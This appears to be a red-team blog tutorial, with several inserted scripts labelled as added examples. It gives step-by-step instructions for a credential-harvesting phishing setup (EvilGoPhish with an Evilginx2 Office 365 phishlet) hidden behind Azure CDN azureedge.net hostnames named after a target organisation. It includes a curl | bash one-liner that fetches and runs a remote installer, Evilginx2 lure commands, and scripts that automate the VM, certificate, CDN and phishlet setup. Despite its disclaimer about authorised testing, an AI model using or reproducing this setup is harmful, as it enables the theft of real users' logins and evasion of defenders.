CDN Phishing

Whether you stumbled across this post *by accident* or you need to build a good phishing campaign, I am here to help you with all that and a bag of chips!

This article aims to teach offensive teams how to mask their phishing infrastructure behind a Content Delivery Network (CDN) in Azure: the target only ever sees an azureedge.net hostname, while the virtual machine running the phishing kit sits behind it. The setup itself is very easy, but understanding how the pieces fit together may be more convoluted. Let me walk you through creating a virtual machine in Azure, fronting it with a CDN, and using it to send out a phishing email.

Disclaimer

I shall not be responsible or liable for any misuse or illegitimate use of this guide. It is only to be used in authorized penetration testing or red team engagements where the operators have been given explicit written permission to carry out social engineering.

A word of warning! This article is not an in-depth guide on:

  • The detailed networking of a CDN.

  • How Apache2 works.

  • How tmux works.

  • How to set up a phishing campaign.

  • How to set up an SMTP relay (e.g. Mailgun).

Throughout this guide, if you have ANY questions, you can contact me on Discord. I am always active there.

Setting up a Virtual Machine

First things first, we want to set up a virtual machine in Azure. The reason we use Azure is that its public IP address can be given a DNS name label under <region>.cloudapp.azure.com, a hostname you control without registering a domain, so Let's Encrypt will issue a certificate for it (this is the certificate Apache serves on port 443 behind the CDN) with:

certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com

Let's get started:

  1. Navigate to https://portal.azure.com and log in.

  2. Go to Virtual Machines and create a Virtual Machine.

    1. Make sure to grab your SSH keys for this. Default user: azureuser

  3. Go to the resource you just created and click "Public IP Address" (it is located in the "Essentials" section of the resource).

    1. Once in there, add a DNS name label; the result should look like "YOURDNSNAME.eastus.cloudapp.azure.com".

    2. Note this for later.

  4. Ensure that inbound ports 80 (HTTP), 443 (HTTPS) and 587 (SMTP submission over STARTTLS) are open by going to the Virtual Machine you just created > Networking > "Add inbound port rule".

  5. Lastly, let's access the virtual machine you just created!

  6. In a bash console (or PowerShell), SSH into it: ssh -L 3333:localhost:3333 azureuser@[ip-address], replacing [ip-address] with the public IP address of your virtual machine. The -L forwards the GoPhish admin panel (port 3333, which only listens on localhost) to your workstation, so it never has to be exposed to the internet.

  7. Start a tmux session: tmux new

    1. If you are struggling with tmux usage, tmuxcheatsheet is a great resource.
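The same VM setup done from the Azure CLI instead of the portal, as an added example that is not part of the original post. The resource group, region, VM name, image and DNS label below are assumptions; with DRY_RUN=1 the script only prints the az commands it would run, and DEPLOY=1 actually runs them.

```shell
#!/bin/sh
# Added example (not from the original post): Azure CLI equivalent of the
# portal steps above. Names, region and image are assumptions.
set -eu

RG="${RG:-phish-rg}"
LOCATION="${LOCATION:-eastus}"
VM="${VM:-phish-vm}"
DNS_LABEL="${DNS_LABEL:-yourdnsname}"   # becomes yourdnsname.eastus.cloudapp.azure.com
IMAGE="${IMAGE:-Ubuntu2204}"            # the installer is only tested on Debian/Ubuntu
DRY_RUN="${DRY_RUN:-0}"

# Print each az call, and execute it unless DRY_RUN=1.
run() { echo "+ $*"; [ "$DRY_RUN" = 1 ] || "$@"; }

create_vm() {
  run az group create --name "$RG" --location "$LOCATION"
  # --public-ip-address-dns-name is the "DNS name label" set on the public
  # IP in the portal; --generate-ssh-keys creates ~/.ssh/id_rsa if missing.
  run az vm create --resource-group "$RG" --name "$VM" --image "$IMAGE" \
    --admin-username azureuser --generate-ssh-keys \
    --public-ip-address-dns-name "$DNS_LABEL"
}

# The "Add inbound port rule" step: one NSG rule for HTTP, HTTPS and SMTP
# submission. SSH (22) is already opened by az vm create.
open_ports() {
  run az vm open-port --resource-group "$RG" --name "$VM" \
    --port 80,443,587 --priority 1001
}

# -L 3333 tunnels the GoPhish admin panel instead of exposing it publicly.
ssh_hint() {
  ip="$1"
  echo "ssh -L 3333:localhost:3333 azureuser@$ip"
}

if [ "${DEPLOY:-0}" = 1 ]; then
  create_vm
  open_ports
  IP=$(az vm show -d --resource-group "$RG" --name "$VM" --query publicIps -o tsv)
  echo "FQDN: $DNS_LABEL.$LOCATION.cloudapp.azure.com"
  ssh_hint "$IP"
fi
```

Run it as `DRY_RUN=1 DEPLOY=1 sh deploy-vm.sh` first to review the exact commands, then without DRY_RUN to create the resources.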

Installing EvilGoPhish

Full credit for this section goes to Fin3ss3g0d for this beautiful tool! It automates wiring GoPhish, Evilginx2 and Apache together. Luckily for you, I've created a one-liner that streamlines this process and gives some nice prompts!

!!WARNING: THIS HAS ONLY BEEN TESTED ON DEBIAN AND UBUNTU IMAGES!!

My Bash One-Liner

Let's get started!

  1. First, in the bash shell, run curl -sSL https://raw.githubusercontent.com/stevesec/egp_basicinstall/main/basic_install.sh | bash

    1. Run this as root, or as a user in the sudoers group; the script checks which one you are. (As with any curl | bash, fetch the script and read it before running it.)

  2. Press "Enter" through the prompts until you reach the "root domain" prompt, then enter azureedge.net; the CDN endpoints we create later live under this domain.

  3. After the root domain prompt, enter your subdomains, with a space between them, replacing target with your target organization:

    1. target-login target-account

    2. Note these for later; they become the CDN endpoint names.

    3. They must end in "-login" and "-account" respectively or this process will not work!

  4. Then enter your redirect URL (a good rule of thumb is to base it on your target's infrastructure, i.e. Office 365 or the Google account login).

  5. Enter the RID you want to use (this may be expanded on in the future; testing is still required for the rule engine implementation).

  6. The next couple of prompts are the user's preference:

    1. Proxying the root domain should be "no", as we do not own "azureedge.net".

    2. Enabling the Live Feed opens a feed on port 1337.

    3. Enabling the Apache blacklist gives you a list of IP addresses that the web server rejects.

  7. If you're satisfied with your "User Settings", click "Yes". If not, click "Edit Settings".

  8. If you want to use Mailgun, I have included a prompt for setting that up; if not, click "No".

  9. The setup process should begin, and EvilGoPhish will be installed in /etc/.evilgophish/

Let's Encrypt Certificate

Remember that prompt for YOURDNSNAME.eastus.cloudapp.azure.com??? You're going to need it now!

  1. In the bash shell, type certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com, replacing YOURDNSNAME.eastus.cloudapp.azure.com with the name you created above.

  2. Select 1 in the prompt, which spins up a temporary (standalone) web server on port 80 for the HTTP-01 challenge.

  3. Follow the prompts, making sure to agree with the Terms of Service.

    1. If this step fails, check your listening ports with netstat -tulpn: Apache2 is probably already on port 80. Stop it (systemctl stop apache2.service) before retrying, and start it again afterwards.

  4. If all goes well, you should have a nice, shiny, new certificate from Let's Encrypt! Note where it is placed (usually /etc/letsencrypt/live/[CertificateName]/, containing cert.pem, chain.pem, fullchain.pem and privkey.pem).

Let's stick that in the enabled sites:

  1. Edit with your favorite text editor 😉 nano /etc/apache2/sites-enabled/000-default.conf and enter the certificate paths where it says:

    1. SSLCertificateFile (cert.pem)

    2. SSLCertificateChainFile (chain.pem)

    3. SSLCertificateKeyFile (privkey.pem)

  2. If all goes well here, you should be able to type: systemctl restart apache2.service

    1. NOTE: Apache2 may show as listening only on IPv6 :::443. To bind IPv4 explicitly, edit /etc/apache2/ports.conf so the ssl_module block reads Listen 0.0.0.0:443; after a restart it should be listening on 0.0.0.0:443.
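The certificate and Apache steps above as one script, added here as an example that is not code from the original post or from EvilGoPhish. The hostname and the two Apache file paths are assumptions; the functions that edit the config files are separated from the certbot call so they can be checked on a copy of the files first.

```shell
#!/bin/sh
# Added example (not from the original post or EvilGoPhish): issue the
# Let's Encrypt certificate in certbot's standalone mode, point the Apache
# vhost at it and make Apache bind 443 on IPv4.
set -eu

# Assumed values; override them in the environment.
FQDN="${FQDN:-YOURDNSNAME.eastus.cloudapp.azure.com}"
VHOST="${VHOST:-/etc/apache2/sites-enabled/000-default.conf}"
PORTS_CONF="${PORTS_CONF:-/etc/apache2/ports.conf}"

# certbot --standalone binds port 80 itself (option "1" in the interactive
# prompt), so Apache must not be holding the port while it runs.
issue_cert() {
  systemctl stop apache2.service
  certbot certonly --standalone --non-interactive --agree-tos \
    --register-unsafely-without-email -d "$FQDN"
}

# Rewrite the three SSL directives already present in the vhost to the files
# certbot writes under /etc/letsencrypt/live/<name>/ (cert.pem, chain.pem,
# privkey.pem). Only the directive values change; the rest of the vhost stays.
set_ssl_paths() {
  conf="$1"
  live="/etc/letsencrypt/live/$2"
  sed -i \
    -e "s|^\([[:space:]]*SSLCertificateFile\)[[:space:]].*|\1 $live/cert.pem|" \
    -e "s|^\([[:space:]]*SSLCertificateChainFile\)[[:space:]].*|\1 $live/chain.pem|" \
    -e "s|^\([[:space:]]*SSLCertificateKeyFile\)[[:space:]].*|\1 $live/privkey.pem|" \
    "$conf"
}

# Turn "Listen 443" (inside <IfModule ssl_module>) into an explicit IPv4 bind,
# the change the post recommends when only :::443 shows up in netstat.
fix_listen() {
  sed -i -e 's|^\([[:space:]]*\)Listen 443[[:space:]]*$|\1Listen 0.0.0.0:443|' "$1"
}

if [ "${DEPLOY:-0}" = 1 ]; then
  issue_cert
  set_ssl_paths "$VHOST" "$FQDN"
  fix_listen "$PORTS_CONF"
  systemctl restart apache2.service
  ss -tlnp | grep ':443'   # confirm the bind address after the restart
fi
```

Run it with `DEPLOY=1 FQDN=yourname.eastus.cloudapp.azure.com sh ssl-setup.sh` on the VM; without DEPLOY=1 it only defines the functions.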

Setup CDN

Remember the subdomains you created with the bash one-liner? Let's grab those and get a move on with creating the CDN in Azure. Two settings matter here: the origin host header must be the endpoint's own azureedge.net name, so Apache and Evilginx see requests for the phishing hostname rather than for the VM's IP address, and caching must be bypassed for query strings, so responses to lure URLs (which carry the RID as a query string) always come from the origin instead of a cached copy.

  1. Search for and go to Front Door and CDN Profiles and follow the prompts:

    1. Enter your first subdomain as the "CDN Endpoint Name" (don't worry, we'll be adding the second one shortly)

    2. CDN Endpoint Name: target-login

    3. Origin Type: Custom Origin

    4. Origin hostname: public IP address of the virtual machine

  2. Click "Review + Create".

  3. Go to the resource that was just created and click "Origin".

  4. Click the origin named after the VM's IP address ("origin-ip-address").

  5. Change the "Origin host header" to the CDN endpoint name (i.e. target-login.azureedge.net) and click "Save".

  6. Navigate to "Compression", turn it off, and click "Save".

  7. Navigate to "Caching Rules", set it to "Bypass caching for query strings", and click "Save".

  8. Click "+ Endpoint" to create a second endpoint:

    1. Enter your second subdomain as the "CDN Endpoint Name".

    2. CDN Endpoint Name: target-account

    3. Origin Type: Custom Origin

    4. Origin Hostname: public IP address of the virtual machine

    5. Origin Host Header: the CDN endpoint name (i.e. target-account.azureedge.net)

  9. Click "Add".

  10. Repeat steps 6 and 7 (compression off, bypass caching for query strings) for the second endpoint.
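The same two endpoints created from the Azure CLI, added here as an example that is not code from the original post or from Azure. The profile name, SKU and origin IP are assumptions; the endpoint names are the two subdomains given to the installer and must be globally unique under azureedge.net. DRY_RUN=1 prints the commands, DEPLOY=1 runs them.

```shell
#!/bin/sh
# Added example (not from the original post or Azure): create the CDN profile
# and both endpoints with the origin host header, compression and caching
# settings the portal walkthrough sets by hand.
set -eu

RG="${RG:-phish-rg}"
PROFILE="${PROFILE:-phish-cdn}"
ORIGIN_IP="${ORIGIN_IP:-203.0.113.10}"   # assumed public IP of the VM
DRY_RUN="${DRY_RUN:-0}"

run() { echo "+ $*"; [ "$DRY_RUN" = 1 ] || "$@"; }

# The installer expects exactly one "-login" and one "-account" subdomain.
check_name() {
  case "$1" in
    *-login|*-account) return 0 ;;
    *) echo "subdomain must end in -login or -account: $1" >&2; return 1 ;;
  esac
}

create_profile() {
  run az cdn profile create --resource-group "$RG" --name "$PROFILE" \
    --sku Standard_Microsoft
}

# One endpoint per subdomain. The origin host header is the endpoint's own
# azureedge.net name so the VM sees the phishing hostname; compression is off
# and query-string requests bypass the cache so lure URLs (which carry the
# RID) always hit the origin.
create_endpoint() {
  name="$1"
  check_name "$name"
  run az cdn endpoint create --resource-group "$RG" --profile-name "$PROFILE" \
    --name "$name" --origin "$ORIGIN_IP" \
    --origin-host-header "$name.azureedge.net" \
    --enable-compression false \
    --query-string-caching-behavior BypassCaching
}

if [ "${DEPLOY:-0}" = 1 ]; then
  create_profile
  for sub in target-login target-account; do
    create_endpoint "$sub"
  done
fi
```

After deployment, `az cdn endpoint show --resource-group phish-rg --profile-name phish-cdn --name target-login` lets you confirm the origin host header and caching behaviour match what the portal steps set.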

Edit Evilginx Phishlet

We will now edit the phishlet for Evilginx2 so that its proxied subdomains match the two CDN endpoints we created. Each proxy_hosts entry has a phish_sub, the subdomain Evilginx serves that proxied host on; it must equal the CDN endpoint name, otherwise requests for that host never reach Evilginx.

  1. Edit with your favorite text editor 😉 nano /etc/.evilgophish/evilginx2/phishlets/o3652.yaml

  2. Under "proxy_hosts":

    1. Change "phish_sub: 'login'" to "phish_sub: 'target-login'", and

    2. Change "phish_sub: 'account'" to "phish_sub: 'target-account'"
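The phishlet edit scripted, as an added example that is not part of the original post or of Evilginx2: it prefixes every phish_sub with the target name, refuses to prefix a file twice, and prints the hostnames the edited phishlet needs as CDN endpoints so you can compare them with the endpoints created above. The prefix, file path and CDN domain are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post or Evilginx2): rewrite phish_sub
# values in a phishlet and list the CDN endpoint names it now expects.
set -eu

PHISHLET="${PHISHLET:-/etc/.evilgophish/evilginx2/phishlets/o3652.yaml}"
PREFIX="${PREFIX:-target}"
CDN_DOMAIN="${CDN_DOMAIN:-azureedge.net}"

# 'login' -> 'target-login', 'account' -> 'target-account'. Handles both the
# inline "- {phish_sub: 'login', ...}" form and one-key-per-line YAML, leaves
# orig_sub untouched, and is a no-op if the prefix is already present.
prefix_phish_subs() {
  file="$1"
  prefix="$2"
  if grep -q "phish_sub: '$prefix-" "$file"; then
    echo "phish_sub values in $file already carry the prefix '$prefix-'" >&2
    return 0
  fi
  sed -i "s/phish_sub: '\([^']\{1,\}\)'/phish_sub: '$prefix-\1'/" "$file"
}

# One line per proxy host: the hostname that must exist as a CDN endpoint.
list_phish_hosts() {
  sed -n "s/.*phish_sub: '\([^']\{1,\}\)'.*/\1.$2/p" "$1"
}

# The installer only creates "-login" and "-account" subdomains, so any other
# proxy host in the phishlet would have no CDN endpoint and never resolve.
check_hosts() {
  list_phish_hosts "$1" "$2" | while read -r host; do
    case "$host" in
      *-login.*|*-account.*) echo "ok: $host" ;;
      *) echo "no CDN endpoint for: $host" >&2; exit 1 ;;
    esac
  done
}

if [ "${APPLY:-0}" = 1 ]; then
  prefix_phish_subs "$PHISHLET" "$PREFIX"
  check_hosts "$PHISHLET" "$CDN_DOMAIN"
fi
```

Run `APPLY=1 PREFIX=target sh phishlet-prefix.sh` on the VM; the "ok:" lines are exactly the endpoint names that must exist in the CDN profile.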

Start Up EvilGoPhish

Lastly, we will start up EvilGoPhish. We run Evilginx2 in developer mode: in that mode it generates its own self-signed certificate instead of requesting one from Let's Encrypt (which it could not do for azureedge.net, a domain we do not control), while Apache terminates TLS in front of it with the Let's Encrypt certificate we obtained above.

  1. From the /etc/.evilgophish/ directory, navigate to the gophish directory.

  2. Start GoPhish, noting the admin password printed on first start (this will need to be changed later):

    1. ./gophish

    2. This initializes gophish.db, which Evilginx2 will read so that its captures are tied to the GoPhish campaign.

  3. Follow the GoPhish setup to set up an email campaign (the admin panel is reachable on localhost:3333 through the SSH tunnel opened earlier).

  4. Navigate back to the evilginx2 directory.

  5. Start Evilginx2:

    1. ./evilginx2 -g ../gophish/gophish.db -debug -developer -p phishlets/

    2. ALWAYS use developer mode with a CDN in front: without it, Evilginx2 tries to obtain Let's Encrypt certificates for the configured domain itself, which fails for azureedge.net.

    3. This starts Evilginx2 in developer mode, which does not require an SSL certificate.

  6. Now, let's configure Evilginx2! Type in:

    1. config domain azureedge.net

    2. config ip [ip address of Virtual Machine]

    3. phishlets hostname o3652 azureedge.net

    4. phishlets enable o3652

    5. lures create o3652

    6. lures get-url 0

  7. Enter that URL into the GoPhish campaign and you should be ready to go!

  8. If everything worked out, you should now have hostnames under azureedge.net that capture credentials.
